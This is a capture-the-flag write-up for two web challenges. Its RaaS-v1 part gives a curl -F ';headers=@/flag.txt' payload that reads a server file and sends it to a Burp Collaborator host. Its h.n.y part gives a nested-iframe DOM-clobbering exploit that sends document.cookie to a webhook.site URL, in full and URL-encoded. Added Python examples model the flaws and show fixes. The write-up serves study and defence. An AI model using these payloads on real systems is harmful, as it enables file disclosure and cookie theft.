I only managed to solve two of these on my own, which is pretty weak.
RaaS-v1
A documentation-reading challenge.
The challenge ships its source code.
The final command concatenation is here:
    foreach($formParams as $key => $value){
        // only keys made of word characters are accepted
        if(preg_match("/^\w+$/",$key)){
            $cmd .= '-F ';
            // note the space after '=' inside the quoted argument
            $cmd .= escapeshellarg($key.'= '.$value);
        }
    }
There is an extra space after the =, so the attempt to upload a file through the -F parameter fails.
After concatenation the command looks like this:
curl --proto -file "http://127.0.0.1" -X "GET" -F "file= @/flag.txt"
Because of the extra space, curl sends the literal string @/flag.txt (curl only treats @ as a file reference when it is the first character of the value).
Reading curl's official documentation directly, I found this:
https://curl.se/docs/manpage.html#-F
You can add custom headers to the field by setting headers=, like
curl -F "submit=OK;headers=\"X-submit-type: OK\"" example.com
or
curl -F "submit=OK;headers=@headerfile" example.com
So headers= can be used instead.
Payload:
http://raas-v1.asisctf.com:9000/?url=https://3sw5lub27zg8aeffl8bc7hupegk98y.burpcollaborator.net&method=POST&formParams[file]=submit=OK;headers=@/flag.txt
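To make the two behaviours concrete, here is an added Python example (not part of the write-up and not the challenge's code) that reproduces the PHP loop's quoting, models the small subset of curl's -F value grammar that matters here, and shows the fix a maintainer would apply: --form-string, which makes curl take the value literally. curl_form_file_refs is a deliberate approximation of curl's real -F parsing, and the sample form parameters are constructed.

```python
import re
import shlex

# Same allow-list as the challenge's preg_match("/^\w+$/", $key). In both PCRE
# and Python, '$' also matches just before a trailing newline.
KEY_RE = re.compile(r"^\w+$")


def escapeshellarg(arg: str) -> str:
    """Mimic PHP's escapeshellarg(): single-quote the string and turn every
    embedded single quote into '\\'' (close quote, escaped quote, reopen)."""
    return "'" + arg.replace("'", "'\\''") + "'"


def build_form_args(form_params: dict, fix_space: bool = False) -> str:
    """Reproduce the challenge loop: '-F ' + escapeshellarg(key.'= '.value).
    fix_space=True drops the stray space after '=' so the two can be compared.
    (The original appended fields back to back; a space separates them here
    only so the fragment stays parseable for the check below.)"""
    sep = "=" if fix_space else "= "
    parts = []
    for key, value in form_params.items():
        if KEY_RE.match(key):
            parts.append("-F " + escapeshellarg(f"{key}{sep}{value}"))
    return " ".join(parts)


def build_safe_form_args(form_params: dict) -> str:
    """Hardened variant: --form-string makes curl use the value literally, so a
    leading '@' or '<' and ';headers=' / ';type=' sub-options mean nothing."""
    parts = []
    for key, value in form_params.items():
        if KEY_RE.match(key):
            parts.append("--form-string " + escapeshellarg(f"{key}={value}"))
    return " ".join(parts)


def curl_form_file_refs(field: str) -> list:
    """Approximation of how curl interprets one -F 'name=value' field: report
    every way the value makes curl read a local file. Only the rules used in
    the write-up are modelled: '@file' (upload) or '<file' (content) as the
    FIRST character of the value, and a ';headers=@file' sub-option. curl's
    real parser also handles quoting, ';type=', ';filename=' and ';encoder='."""
    _name, _, value = field.partition("=")
    main, *options = value.split(";")
    refs = []
    if main.startswith("@"):
        refs.append(("upload", main[1:]))
    elif main.startswith("<"):
        refs.append(("content", main[1:]))
    for opt in options:
        key, _, val = opt.partition("=")
        if key.strip() == "headers" and val.startswith("@"):
            refs.append(("headers", val[1:]))
    return refs


def command_file_reads(cmd_fragment: str) -> list:
    """Tokenise a curl argument fragment with POSIX shell rules (the shell undoes
    escapeshellarg's quoting the same way) and collect the file reads implied
    by -F fields. --form-string fields are skipped: curl never interprets them."""
    tokens = shlex.split(cmd_fragment)
    reads = []
    i = 0
    while i < len(tokens):
        if tokens[i] == "-F" and i + 1 < len(tokens):
            reads.extend(curl_form_file_refs(tokens[i + 1]))
            i += 2
        elif tokens[i] == "--form-string":
            i += 2
        else:
            i += 1
    return reads


if __name__ == "__main__":
    # Constructed inputs mirroring the write-up's two attempts.
    for params in ({"file": "@/flag.txt"}, {"file": "submit=OK;headers=@/flag.txt"}):
        frag = build_form_args(params)
        print(frag, "->", command_file_reads(frag))
        safe = build_safe_form_args(params)
        print(safe, "->", command_file_reads(safe))
```

Running it shows the chain of events: the stray space neutralises the plain @/flag.txt upload, the ;headers=@ sub-option still reads the file through the same escaped argument, and --form-string produces no file read for either input because escapeshellarg was never the problem; the problem is handing user data to an option whose value has its own grammar.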
h.n.y
The source code is provided.
index.html looks like this:
    <html>
    <head>
        <title>hi</title>
    </head>
    <body>
        <h1>definitely not vulnerable to XSS</h1>
        <div>
            MSG
        </div>
        <script nonce="$nonce$">
            try{
                eval(window.h.a.p.p.y._.n.e.w._.y.e.a.r._.h.a.c.k.e.r.s.toString())
            }catch(e){}
        </script>
    </body>
    </html>
This clearly calls for DOM clobbering.
I'd recommend a tool for this:
https://github.com/splitline/DOM-Clobber3r
The payload can be generated directly with this tool.
(Because the challenge enforces a CSP, the flag is exfiltrated here by redirecting with javascript:location.href='https://webhook.site/d3e541cd-3183-44a1-a437-db45aaf9ffb8/'+document.cookie.)
Be careful to strip the extra quotes on both sides: the redirect URL itself contains quotes, and otherwise it will not parse correctly.
One last thing to watch for: eval(window.h.a.p.p.y._.n.e.w._.y.e.a.r._.h.a.c.k.e.r.s.toString()) may run before the DOM has finished loading, so a few synchronously loaded link tags, <link rel="stylesheet" href="style.css">, have to be appended at the end.
exp:
<iframe name=h srcdoc="<iframe name=a srcdoc="<iframe name=p srcdoc=&quot;<iframe name=p srcdoc=&amp;quot;<iframe name=y srcdoc=&amp;amp;quot;<iframe name=_ srcdoc=&amp;amp;amp;quot;<iframe name=n srcdoc=&amp;amp;amp;amp;quot;<iframe name=e srcdoc=&amp;amp;amp;amp;amp;quot;<iframe name=w srcdoc=&amp;amp;amp;amp;amp;amp;quot;<iframe name=_ srcdoc=&amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=y srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=e srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=a srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=r srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=_ srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=h srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=a srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=c srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=k srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=e srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<iframe name=r srcdoc=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;<a id='s' 
href=javascript:location.href='https://webhook.site/d3e541cd-3183-44a1-a437-db45aaf9ffb8/'+document.cookie></a>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;amp;quot;></iframe>&amp;amp;amp;quot;></iframe>&amp;amp;quot;></iframe>&amp;quot;></iframe>&quot;></iframe>"></iframe>"></iframe><link rel="stylesheet" href="style.css"><link rel="stylesheet" href="style.css"><link rel="stylesheet" href="style.css"><link rel="stylesheet" href="style.css"><link rel="stylesheet" href="style.css">
URL-encode it and send it (the challenge limits the payload length, so the extra newlines also have to be removed):
http://5.75.142.234:9000/hack?p=http%3A%2F%2Flocalhost%3A9000%3Fp%3D%253Ciframe%2520name%253Dh%2520srcdoc%253D%2522%253Ciframe%2520name%253Da%2520srcdoc%253D%2526quot%253B%253Ciframe%2520name%253Dp%2520srcdoc%253D%2526amp%253Bquot%253B%253Ciframe%2520name%253Dp%2520srcdoc%253D%2526amp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Dy%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253D_%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Dn%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253De%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Dw%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253D_%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Dy%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253De%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Da%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Dr%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253D_%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Dh%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Da%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Dc%25
20srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Dk%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253De%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ciframe%2520name%253Dr%2520srcdoc%253D%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253Ca%2520id%253D's'%2520href%253Djavascript%253Alocation.href%253D'https%253A%252F%252Fwebhook.site%252Fd3e541cd-3183-44a1-a437-db45aaf9ffb8%252F'%252Bdocument.cookie%253E%253C%252Fa%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp
%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bamp%253Bquot%253B%253E%253C%252Fiframe%253E%2526amp%253Bquot%253B%253E%253C%252Fiframe%253E%2526quot%253B%253E%253C%252Fiframe%253E%2522%253E%253C%252Fiframe%253E%253Clink%2520rel%253D%2522stylesheet%2522%2520href%253D%2522style.css%2522%253E%253Clink%2520rel%253D%2522stylesheet%2522%2520href%253D%2522style.css%2522%253E%253Clink%2520rel%253D%2522stylesheet%2522%2520href%253D%2522style.css%2522%253E%253Clink%2520rel%253D%2522stylesheet%2522%2520href%253D%2522style.css%2522%253E%253Clink%2520rel%253D%2522stylesheet%2522%2520href%253D%2522style.css%2522%253E
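As an added example (not code from the write-up or from the DOM-Clobber3r project), here is a server-side check in Python that a sanitizer could run on user-supplied markup before rendering it next to a script like the one above: it parses iframe srcdoc attributes recursively, records which identifiers become named window properties at each nesting depth, and reports how much of the page's eval() target path the markup is able to clobber. The three-level SAMPLE and its PLACEHOLDER href are constructed; the matching rule (name= or id= on any element) deliberately over-approximates.

```python
from html.parser import HTMLParser

# Global property chain the challenge page eval()s, copied from index.html.
TARGET_PATH = "h.a.p.p.y._.n.e.w._.y.e.a.r._.h.a.c.k.e.r.s"


class ClobberScanner(HTMLParser):
    """Records every name=/id= attribute together with its srcdoc nesting
    depth. HTMLParser unescapes attribute values, so feeding a srcdoc value to
    a child scanner peels exactly one layer of &quot;/&amp; encoding, which is
    how nested-iframe clobbering chains are layered."""

    def __init__(self, depth: int = 0):
        super().__init__(convert_charrefs=True)
        self.depth = depth
        self.found = []  # (depth, tag, attribute, value)

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        # Over-approximation: name= only clobbers window for a few tags
        # (iframe, form, img, embed, object), but any id= does.
        for attr in ("name", "id"):
            value = attrs.get(attr)
            if value:
                self.found.append((self.depth, tag, attr, value))
        srcdoc = attrs.get("srcdoc")
        if tag == "iframe" and srcdoc:
            child = ClobberScanner(self.depth + 1)
            child.feed(srcdoc)
            child.close()
            self.found.extend(child.found)


def named_by_depth(html: str) -> dict:
    """Map nesting depth -> set of identifiers that become named properties."""
    scanner = ClobberScanner()
    scanner.feed(html)
    scanner.close()
    out = {}
    for depth, _tag, _attr, value in scanner.found:
        out.setdefault(depth, set()).add(value)
    return out


def matched_depth(html: str, path: str) -> int:
    """How many leading segments of the dotted path the markup can clobber:
    segment i must be defined at srcdoc depth i (window.h is frame h's window,
    .a is a named element inside it, and so on). A result equal to the number
    of segments means the whole eval() target is attacker-controlled."""
    by_depth = named_by_depth(html)
    matched = 0
    for i, seg in enumerate(path.split(".")):
        if seg in by_depth.get(i, set()):
            matched += 1
        else:
            break
    return matched


def is_clobbered(html: str, path: str = TARGET_PATH) -> bool:
    return matched_depth(html, path) == len(path.split("."))


# Constructed three-level sample in the same shape as the write-up's payload
# (the real one nests 22 frames); the href is a placeholder, not a real URL.
SAMPLE = (
    '<iframe name=h srcdoc="'
    '<iframe name=a srcdoc=&quot;<a id=s href=PLACEHOLDER></a>&quot;></iframe>'
    '"></iframe>'
    '<link rel="stylesheet" href="style.css">'
)

if __name__ == "__main__":
    print(named_by_depth(SAMPLE))
    print(matched_depth(SAMPLE, "h.a.s"), is_clobbered(SAMPLE, "h.a.s"))
    print(matched_depth(SAMPLE, TARGET_PATH))
```

The durable fix is on the script side rather than in the sanitizer: never resolve a security-relevant value through a window property chain that user markup can define (keep it in a module-scoped variable, or at least reject anything that is an Element before using it), and have the sanitizer rewrite or drop name= and id= attributes; DOMPurify's SANITIZE_NAMED_PROPS option does this by prefixing them.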